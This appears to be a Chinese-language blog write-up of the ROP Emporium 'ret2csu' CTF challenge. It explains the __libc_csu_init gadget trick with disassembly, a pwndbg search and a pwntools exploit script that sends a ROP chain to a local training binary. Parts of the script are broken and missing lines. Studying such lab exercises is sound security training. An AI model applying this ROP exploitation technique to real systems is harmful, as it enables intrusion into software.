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Write-ups: ROP Emporium series

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两月一号了,眼看九号就要打比赛我却还没学过 ret2csuSROP,所以特此提前开一章 ROP Emporium 的题解,问就是里面有一道 ret2csu,而且早晚会得这份题库的 LMAO

可惜没有 SROP,那这个我只能去 Nightmare 找题做了,要不就自己出一题也行。

啊,突然想起来还有 ret2dlresolveret2vDSO……一会儿再开一章 tricks 专题好了,就从 ROP 的 tricks 开始写。

Challenge 8



We’re back in ret2win territory, but this time with no useful gadgets.
How will we populate critical registers without them?


好啊,ROP Emporium 一共就八道题,而 ret2csu 就是这最后一题,有种上来就 bypass 小怪直奔去 attack BOSS’s ass 的感觉,帅不帅?(bushi)

嗯……有关 ret2csu 这个 trick 的详细信息,可以去读这篇发在 Black Hat Asia 的论文1.

简单来说就是当你找不到可以控制函数参数的 gadgets 时,就可以考虑一下这个 trick.

当一个程序使用某些库(如 libc)时,它有一些内置函数来管理程序不同部分之间的通信。在这些函数中,有一些隐藏的宝石可以作为我们缺失的 gadgets,特别是一个叫 __libc_csu_init 的函数。——Hack Tricks

就以本题的 __libc_csu_init 为例(不同版本的 libc 的这个函数可能略有区别,不过影响不大),看一下里面有什么好东东:

__libc_csu_init ; =============== S U B R O U T I N E =======================================
__libc_csu_init ; void __fastcall _libc_csu_init(unsigned int, __int64, __int64)
__libc_csu_init public __libc_csu_init
__libc_csu_init __libc_csu_init proc near ; DATA XREF: _start+16↑o
__libc_csu_init ; __unwind {
__libc_csu_init 000 push r15
__libc_csu_init+2 008 push r14
__libc_csu_init+4 010 mov r15, rdx
__libc_csu_init+7 010 push r13
__libc_csu_init+9 018 push r12
__libc_csu_init+B 020 lea r12, __frame_dummy_init_array_entry ; Load Effective Address
__libc_csu_init+12 020 push rbp
__libc_csu_init+13 028 lea rbp, __do_global_dtors_aux_fini_array_entry ; Load Effective Address
__libc_csu_init+1A 028 push rbx
__libc_csu_init+1B 030 mov r13d, edi
__libc_csu_init+1E 030 mov r14, rsi
__libc_csu_init+21 030 sub rbp, r12 ; Integer Subtraction
__libc_csu_init+24 030 sub rsp, 8 ; Integer Subtraction
__libc_csu_init+28 038 sar rbp, 3 ; Shift Arithmetic Right
__libc_csu_init+2C 038 call _init_proc ; Call Procedure
__libc_csu_init+31 038 test rbp, rbp ; Logical Compare
__libc_csu_init+34 038 jz short loc_400696 ; Jump if Zero (ZF=1)
__libc_csu_init+36 038 xor ebx, ebx ; Logical Exclusive OR
__libc_csu_init+38 038 nop dword ptr [rax+rax+00000000h] ; No Operation
__libc_csu_init+40 loc_400680: ; CODE XREF: __libc_csu_init+54↓j
__libc_csu_init+40 038 mov rdx, r15
__libc_csu_init+43 038 mov rsi, r14
__libc_csu_init+46 038 mov edi, r13d
__libc_csu_init+49 038 call ds:(__frame_dummy_init_array_entry - 600DF0h)[r12+rbx*8] ; Indirect Call Near Procedure
__libc_csu_init+4D 038 add rbx, 1 ; Add
__libc_csu_init+51 038 cmp rbp, rbx ; Compare Two Operands
__libc_csu_init+54 038 jnz short loc_400680 ; Jump if Not Zero (ZF=0)
__libc_csu_init+56 loc_400696: ; CODE XREF: __libc_csu_init+34↑j
__libc_csu_init+56 038 add rsp, 8 ; Add
__libc_csu_init+5A 030 pop rbx
__libc_csu_init+5B 028 pop rbp
__libc_csu_init+5C 020 pop r12
__libc_csu_init+5E 018 pop r13
__libc_csu_init+60 010 pop r14
__libc_csu_init+62 008 pop r15
__libc_csu_init+64 000 retn ; Return Near from Procedure
__libc_csu_init+64 ; } // starts at 400640
__libc_csu_init+64 __libc_csu_init endp
__libc_csu_init+64 ; ---------------------------------------------------------------------------

我们发现有两个实用的 gadgets,分别是:

pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
mov rdx, r15
mov rsi, r14
mov edi, r13d
call QWORD PTR [r12 + rbx * 8]


注意第二个 gadget 也可以是以 ret 结束的,但是需要抵消一些 side effects:

mov rdx, r15
mov rsi, r14
mov edi, r13d
call QWORD PTR [r12 + rbx * 8]
add rbx, 0x1
cmp rbp, rbx
jnz <func>

另外,从 ret2csu gadget 控制 rdi 和 rsi 的另一种方法是通过访问特定的偏移量,可以参考这篇讲 BROP 的论文2.

唯一一个问题可能就是怎么让 call QWORD PTR [r12 + rbx * 8] 调用 _init 了,不解释,直接看操作:

pwndbg> x/a _init
0x4004d0 <_init>: 0x1d058b4808ec8348
pwndbg> search -t dword 0x4004d0
Searching for a 4-byte integer: b'\xd0\x04@\x00'
ret2csu 0x400398 rol byte ptr [rax + rax*2], 1
ret2csu 0x400e38 rol byte ptr [rax + rax*2], 1
ret2csu 0x600398 0x4004d0 (_init)
ret2csu 0x600e38 0x4004d0 (_init)


from contextlib import contextmanager
from pwn import ELF, context, flat, gdb, log, process, remote
context(log_level="debug", terminal="kitty")
FILE = "./ret2csu"
HOST, PORT = "localhost", 1337
gdbscript = """
b *pwnme+133
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
target = None
if local:
global elf
elf = ELF(FILE)
context.binary = elf
target = (
[elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
if debug
else process([elf.path] + (argv or []), env=envp)
target = remote(HOST, PORT)
yield target
if target:
def construct_payload():
padding_to_ret = b"".ljust(0x28, b"A")
_init = 0x600398
__libc_csu_init = elf.symbols["__libc_csu_init"]
generic_gadget_1 = __libc_csu_init + 90
generic_gadget_2 = __libc_csu_init + 64
pop_rdi_ret = __libc_csu_init + 99
cleanup_regs = [b"".ljust(0x8, b"A") * 6]
return flat(
0x0, # rbx
0x1, # rbp
_init, # r12 —▸ _init
b"".ljust(0x8, b"A"), # r13
0xCAFEBABECAFEBABE, # r14 —▸ rsi
0xD00DF00DD00DF00D, # r15 —▸ rdx
b"".ljust(0x8, b"A"), # add rsp, 0x8
*cleanup_regs, # for generic_gadget_1
def attack(target):
payload = construct_payload()
target.sendafter(b"> ", payload)
response = target.recvall(timeout=3)
if b"ROPE{" in response:
return True
except Exception as e:
log.exception(f"An error occurred while performing attack: {e}")
def main():
with launch(debug=False) as target:
if attack(target):
log.success("Attack completed successfully.")
log.failure("Attack did not yield a flag.")
except Exception as e:
log.exception(f"An error occurred in main: {e}")
if __name__ == "__main__":


Flag: ROPE{a_placeholder_32byte_flag!}




  1. Marco-gisbert, Hector and Ismael Ripoll. “return-to-csu: a new method to bypass 64-bit Linux ASLR.” (2018).

  2. A. Bittau, A. Belay, A. Mashtizadeh, D. Mazières and D. Boneh, “Hacking Blind,” 2014 IEEE Symposium on Security and Privacy, Berkeley, CA, USA, 2014, pp. 227-242, doi: 10.1109/SP.2014.22.